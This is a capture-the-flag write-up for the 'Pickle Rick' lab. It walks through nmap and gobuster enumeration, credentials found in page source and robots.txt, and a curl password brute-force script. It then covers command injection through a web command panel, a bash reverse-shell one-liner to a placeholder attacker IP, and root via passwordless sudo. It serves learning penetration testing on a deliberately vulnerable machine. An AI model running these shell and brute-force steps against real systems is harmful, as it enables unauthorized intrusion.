Pickle Rick - A Rick and Morty CTF. Help turn Rick back into a human!
To start, we perform connectivity testing against our target machine.
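As a minimal sketch, assuming the target IP assigned by the platform (shown here as a placeholder), connectivity can be confirmed with `ping` and a quick `nmap` scan:

```bash
# Placeholder IP; replace with the machine's actual address
TARGET=10.10.x.x

# Confirm the host is reachable
ping -c 4 $TARGET

# Quick service/version scan with default scripts
nmap -sV -sC $TARGET
```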
To enumerate other directories, we use `gobuster`.
I tried several different wordlists to discover additional directories (a sample invocation is shown after this list), including:
- `/usr/share/wordlists/dirbuster/directories.jbrofuzz`
- `/usr/share/wordlists/dirbuster/directory-list-1.0.txt`
- `/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`
- `/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt`
- `/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt`
- `/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt`
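The exact flags from the original run aren't recorded here; a typical invocation against the target (placeholder IP) looks like this:

```bash
gobuster dir \
  -u http://10.10.x.x/ \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -t 50
```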
We inspected the page source and discovered an interesting detail: a username embedded within it.
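The same inspection can be done from the command line; the grep pattern below is only an illustration of searching HTML comments for leftover notes:

```bash
# Fetch the page source and show any HTML comments (plus two lines of context)
curl -s http://10.10.x.x/ | grep -i '<!--' -A 2
```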
I was unable to locate the directory I was looking for using Dirsearch and Gobuster, but I did find accessible paths such as `/login`, `/uploads`, and `/login.php`. Since we had already identified a username, it is likely that a login page exists.
Additionally, there are three images located under `/assets`, which I suspect are being used on other pages of the site.
I used Burp Suite and followed the steps in `Activities > OWASP Juice Shop > Who broke my code`. After logging into the login page, I enabled interception in Burp, sent the request to Intruder, and added a payload marker to the password field. I then used a list of common passwords to attempt cracking the login. Initially, I encountered an error using the cluster bomb attack type, so I switched to the sniper attack, which resolved the issue.
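Outside of Burp, the same brute-force idea can be scripted with `curl`; the form field names (`username`, `password`) and the failure check below are assumptions, since the exact request isn't reproduced here:

```bash
#!/usr/bin/env bash
# Rough password brute-force sketch; field names and the "invalid" marker are assumptions.
TARGET=http://10.10.x.x/login.php
USER=FOUND_USERNAME                            # the username discovered in the page source
WORDLIST=/usr/share/wordlists/fasttrack.txt    # any common-password list

while read -r PASS; do
  # Submit the login form and capture the response body
  RESP=$(curl -s -d "username=${USER}&password=${PASS}" "$TARGET")
  # Assume a failed login echoes back an "invalid" message; anything else is worth a look
  if ! echo "$RESP" | grep -qi "invalid"; then
    echo "Possible hit: $PASS"
  fi
done < "$WORDLIST"
```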
"The brute force attack was unsuccessful because I’m receiving a lot of 200 status code, which indicates that the behavior is not as expected."
"I did some research and discovered that many websites include a default file called `robots.txt`. This file is a standard used to communicate with web crawlers and robots, such as those used by search engines, and specifies which parts of the website should not be crawled or indexed."
https://www.seobility.net/en/wiki/Robots.txt
Upon inspecting `robots.txt`, we found some unusual strings and saved them for further analysis.
`Wubbalubbadubdub` --> saved this string, as it may be usable later.
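Checking the file is a one-liner (placeholder IP); a normal `robots.txt` only contains crawler directives such as `User-agent:` and `Disallow:` lines, so a bare string like the one above stands out immediately:

```bash
# Fetch robots.txt; anything that isn't a crawler directive is suspicious
curl -s http://10.10.x.x/robots.txt
```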
**Note to self:** always check `robots.txt`; it may contain interesting details.
Since we previously obtained some information related to usernames, and we suspect that the unusual string we found is a password, we used these details to attempt a login and were successful.
I attempted a command injection and it was successful. I discovered detailed information that could be useful for further actions on this website.
I tried the command shown below, but it was disabled on this machine.
Use the `pwd` command to check the current working directory.
Using the output of the `ls` command, I was able to find the first ingredient for Rick.
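As a rough sketch of the commands run through the command panel; the ingredient filename below is a placeholder rather than the actual name, and `less` is shown as a fallback in case a simpler file-reading command is the one that was disabled:

```bash
pwd                       # confirm where the web application is running from
ls -la                    # list files; the first ingredient file showed up here
less ingredient_file.txt  # placeholder name; a pager works if plain file reads are blocked
```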
I attempted to upload a `php-reverse-shell.php` using the following steps.
I observed communication, but the payload did not appear in the `/assets` directory or in the list after logging in.
Instead, I used the following reverse shell and executed it directly from the Command Panel, which successfully gave me a shell.
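The exact payload isn't reproduced in this write-up; as an illustration only, a common pattern is to start a listener on the attacking machine and fire a one-liner from the command panel (IP and port are placeholders):

```bash
# On the attacking machine: listen for the callback
nc -lvnp 4444

# From the target's command panel: a typical bash reverse-shell one-liner
bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
```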
After gaining access to the shell, I explored the environment and located the second ingredient in the `/home/rick/` directory.
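A minimal sketch of that exploration; the filename shown is a placeholder:

```bash
ls -la /home/rick/                        # the second ingredient file is located here
less /home/rick/second_ingredient.txt     # placeholder filename
```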
I tried it and was able to get root. Normally, using `sudo` will always prompt you for a password; here, however, there was no password prompt. I checked with `sudo -l` and found that `www-data` can run all commands (`ALL`) via `sudo`.
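A minimal sketch of that escalation; the final step assumes the remaining ingredient lives in root's home directory, which is not spelled out above:

```bash
sudo -l        # confirm what www-data may run; here it allowed everything without a password
sudo su -      # spawn a root shell
ls -la /root/  # assumption: the last ingredient is in root's home directory
```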
I successfully completed the Pickle Rick CTF by capturing all the flags, earning 60 points in the process. The points don’t matter much to me, though—what’s important is applying everything I’ve learned so far in this challenge and gaining valuable experience.
While working on this challenge, I also gained new knowledge and techniques throughout the penetration testing process.
I hope this write-up helps you with the Pickle Rick Capture the Flag challenge. It's meant to share knowledge and document the techniques I’ve learned and applied during this challenge, with no intention of infringing on any content.
I reviewed John Hammond's steps and discovered that using Nikto could have made it easier to find the `robots.txt` file. I also learned that including file extensions such as `-x php,sh,txt,cgi,html,js,css,py` when scanning directories can yield results more quickly, streamlining the penetration testing process.
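For reference, those two refinements look roughly like this (placeholder IP):

```bash
# Nikto flags common files such as robots.txt automatically
nikto -h http://10.10.x.x/

# Gobuster with file extensions surfaces pages like login.php in one pass
gobuster dir -u http://10.10.x.x/ \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -x php,sh,txt,cgi,html,js,css,py
```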